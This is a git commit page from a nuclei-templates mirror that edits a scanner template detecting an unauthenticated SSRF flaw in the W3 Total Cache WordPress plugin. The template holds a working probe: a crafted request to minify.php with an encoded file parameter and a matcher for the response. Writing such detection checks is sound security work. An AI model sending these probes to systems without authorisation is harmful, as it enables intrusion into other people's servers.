daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update w3c-total-cache-ssrf.yaml

patch-1
Ritik Chaddha 2022-08-10 14:43:01 +05:30 committed by GitHub
parent 0ebe9f0b8f
commit 37c98909c9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
View File

@ -1,21 +1,23 @@
id: w3c-total-cache-ssrf id: w3c-total-cache-ssrf
info: info:
name: Wordpress W3C Total Cache <= 0.9.4 - Unauthenticated Server Side Request Forgery (SSRF) name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
author: random_robbie author: random_robbie
severity: medium severity: medium
description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. description: |
The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
reference: reference:
- https://wpvulndb.com/vulnerabilities/8644 - https://wpvulndb.com/vulnerabilities/8644
- https://klikki.fi/adv/w3_total_cache.html - https://klikki.fi/adv/w3_total_cache.html
tags: wordpress,wp-plugin,cache,ssrf tags: wordpress,wp-plugin,cache,ssrf,wp
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css' - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "NessusFileIncludeTest" - "NessusFileIncludeTest"
part: body